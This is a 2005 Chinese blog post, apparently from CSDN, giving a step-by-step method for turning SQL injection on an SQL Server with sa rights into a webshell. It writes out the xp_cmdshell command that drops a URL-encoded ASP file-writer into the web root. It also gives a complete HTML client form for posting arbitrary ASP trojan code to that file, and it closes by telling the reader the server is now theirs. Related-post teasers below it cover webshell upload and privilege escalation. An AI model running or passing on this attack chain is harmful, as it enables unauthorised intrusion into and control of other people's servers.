SQL注入与ASP木马上传的又一思路

原创 2005年02月28日 12:15:00

本文适合有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

    SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。
    1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。
    文件内容:
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(request("mypath"),True)
objCountFile.Write request("mydata")
objCountFile.Close
%>
这个文件可以写成一行 <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject"):Set objCountFile=objFSO.CreateTextFile(request("mypath"),True):objCountFile.Write request("mydata"):objCountFile.Close%>

将特殊字符进行编码   就可以得到  %3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

注入(这里假定web目录是C:/Inetpub/wwwroot/):
exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > C:/Inetpub/wwwroot/ftp.asp';

这样  在服务器的web 目录下  将生成一个  ftp.asp文件
该文件的代码为
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(request("mypath"),True)
objCountFile.Write request("mydata")
objCountFile.Close
%>
你可以看到,上面代码中预留了两个接口 mypath   和 mydata
  
mypath是下次提交的时候  文件的生成路径
mydata是文件的内容

在本地编写一个客户端文件  例:RohuClient.htm   代码如下

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>肉鸡文件生成器--客户端    制作:绝对零度  QQ:12216796</title>
<style type="text/css">
<!--
TD {
FONT-SIZE: 9pt; LINE-HEIGHT: 150%
}
BODY {
FONT-SIZE: 12px;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;
SCROLLBAR-FACE-COLOR: #eeeeee;
SCROLLBAR-HIGHLIGHT-COLOR: #ffffff;
SCROLLBAR-SHADOW-COLOR: #dee3e7;
SCROLLBAR-3DLIGHT-COLOR: #d1d7dc;
SCROLLBAR-ARROW-COLOR: #006699;
SCROLLBAR-TRACK-COLOR: #ededed;
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}

A:link {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:hover {
COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline
}
input,select,TEXTAREA {
font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋体";
background-color: #f9f9f9;  
font-size: 9pt ;
border: 1px #d2d2d2 dobble;
line-height:120%;
}

-->
</style>
</head>
<script language="javascript" type="text/javascript">
function chk(theform)
{
if(theform.ftpUrl.value=='')
{
  alert('请输入递交的地址!');
  theform.ftpUrl.focus();
  return false;
}
if(theform.MyPath.value=='')
{
  alert('请输入生成文件的位置!');
  theform.MyPath.focus();
  return false;
}
if(theform.MyData.value=='')
{
  alert('请输入生成文件的内容!');
  theform.MyData.focus();
  return false;
}
theform.action=theform.ftpUrl.value;
}
</script>
<body>
<form name="RohuForm" method="post" action="" onSubmit="return chk(this)" target="_blank">
<table width="673" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="11%">目标位置:</td>
    <td width="79%"><input name="ftpUrl" type="text" id="ftpUrl" size="50">
      例:http://127.0.0.1/FTP.ASP<;/td>
    </tr>
  <tr>
    <td>生成文件:</td>
    <td><input name="MyPath" type="text" id="MyPath">
      将在服务器上,生成的文件路径。例:
C:/Inetpub/wwwroot/Server.asp </td>
    </tr>
  <tr>
    <td valign="top">文件代码:</td>
    <td><textarea name="MyData" cols="100" rows="10" id="textarea"></textarea></td>
    </tr>
  <tr>
    <td> </td>
    <td><input type="submit" name="Submit" value="提交"></td>
    </tr>
</table>
<br>
</form>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td align="center">版权所有:绝对零度(<a href="http://www.rohu.com";>虎盟</a>)</td>
  </tr>
</table>
</body>
</html>

在目标位置栏填上刚刚生成的ftp.asp文件的url地址  
如 http://127.0.0.1/ftp.asp   (这里假设服务器的ip是 127.0.0.1)
在生成文件栏   输入将在服务器上生成的文件名  比如:C:/Inetpub/wwwroot/Server.asp
在文件内容里 ,随意的粘贴一个asp代码   
点递交,当http://127.0.0.1/ftp.asp 文件执行完毕   基本上服务器上的asp木马就生成了。

浏览  http://127.0.0.1/Server.ASP   呵呵  服务器就是你的了。

ASP中SQL不完全思路与防注入程序

引:http://blog.csdn.net/oosky2004/SQL注入简介许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般...
  • feng19821209
  • feng19821209
  • 2005年01月19日 22:18
  • 1633

asp木马伪装成图片或其它,上传漏洞终极解决方法

自从上次给客户网站升级以后,网站安全性得到了进一步加强,不过这两天我在对客户网站进行维护时,发现有2个网站被上传了木马,但由于我设置了读写运行权限,木马虽然上传上了,但是无法运行,所以网站一直没被攻破...
  • god_7z1
  • god_7z1
  • 2011年09月02日 02:07
  • 2071

MySQL注入之木马上传拿webshell

原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找...
  • Liuhuaijin
  • Liuhuaijin
  • 2017年08月15日 11:54
  • 950

SQL注入与ASP木马上传

 SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容:Set objF...
  • Test_sunny
  • Test_sunny
  • 2008年08月03日 09:09
  • 802

SQL注入与ASP木马上传

screen.width/2)this.width=screen.width/2" align="left" vspace="2" border="0" alt="" />如何上传木马,一直是比较头疼...
  • xdfwsl
  • xdfwsl
  • 2006年05月11日 01:39
  • 520

超浅谈web安全中的sql注入以及上传后门

先上几道好吃的菜:firefox的hackbar工具。可以灵活的处理URL里的各种方式的加密解密。 硬菜:sqlmap 自动检测一个网站的各种可能存在的注入。-D 指定库 -T 指定表 -C 指定列 ...
  • fishermanmax
  • fishermanmax
  • 2016年10月30日 22:00
  • 1239

关于ASP木马提升权限

来源: http://www.17nc.com/现在ASP木马是漫天飞,我有一次进去后发现竟然用30多个ASP木马,在帮管理员清理了后,真是累爬了。想想管理员还真是懒的可以……上传了ASP木马之后,如...
  • psyl
  • psyl
  • 2005年03月16日 08:05
  • 4099

浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EX...
  • gscaiyucheng
  • gscaiyucheng
  • 2014年02月28日 17:22
  • 4357

SQL注入与木马上传

  • zgqtxwd
  • zgqtxwd
  • 2008年04月26日 14:02
  • 275

ASP木马提升权限的N种方法

ASP木马提升权限的N种方法Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术一、Serv-U提权    OK,看看他的PROGRAME里面有些什...
  • meiyouhuiyi
  • meiyouhuiyi
  • 2006年07月19日 20:08
  • 1945
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQL注入与ASP木马上传的又一思路
举报原因:
原因补充:

(最多只允许输入30个字)